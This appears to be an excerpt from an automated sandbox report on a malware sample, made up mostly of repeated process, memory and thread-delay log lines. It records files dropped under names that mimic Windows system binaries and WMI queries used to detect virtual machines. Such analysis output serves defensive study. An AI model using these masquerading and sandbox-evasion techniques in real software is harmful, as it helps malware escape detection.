Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\SgrmBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\sihost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Memory allocated: 12E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Memory allocated: 1AEE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Memory allocated: 10C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Memory allocated: 1AC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Memory allocated: CB0000 memory reserve \| memory write watch
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Memory allocated: 1A710000 memory reserve \| memory write watch
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Memory allocated: 2E70000 memory reserve \| memory write watch
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Memory allocated: 1B040000 memory reserve \| memory write watch
Source: C:\Recovery\RuntimeBroker.exe	Memory allocated: DD0000 memory reserve \| memory write watch
Source: C:\Recovery\RuntimeBroker.exe	Memory allocated: 1ACA0000 memory reserve \| memory write watch
Source: C:\Recovery\RuntimeBroker.exe	Memory allocated: 34B0000 memory reserve \| memory write watch
Source: C:\Recovery\RuntimeBroker.exe	Memory allocated: 1B4B0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\SgrmBroker.exe	Memory allocated: 11A0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\SgrmBroker.exe	Memory allocated: 1ACE0000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\SgrmBroker.exe	Memory allocated: 2E90000 memory reserve \| memory write watch
Source: C:\Windows\twain_32\SgrmBroker.exe	Memory allocated: 1AFE0000 memory reserve \| memory write watch
Source: C:\ProgramData\sihost.exe	Memory allocated: 1460000 memory reserve \| memory write watch
Source: C:\ProgramData\sihost.exe	Memory allocated: 1ADE0000 memory reserve \| memory write watch
Source: C:\ProgramData\sihost.exe	Memory allocated: C50000 memory reserve \| memory write watch
Source: C:\ProgramData\sihost.exe	Memory allocated: 1A980000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599829	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599792	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599402	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599292	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599171	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599042	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598911	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598790	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598576	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598476	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598177	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598065	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597943	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597810	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597695	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597560	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597212	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597081	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596976	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596857	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596756	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596655	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596554	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596352	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596236	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596120	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596005	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595904	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595788	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595666	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595450	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595349	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595149	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595033	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 594933	Jump to behavior
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\SgrmBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\SgrmBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\sihost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Window / User API: threadDelayed 1411	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Window / User API: threadDelayed 816	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Window / User API: threadDelayed 4809	Jump to behavior
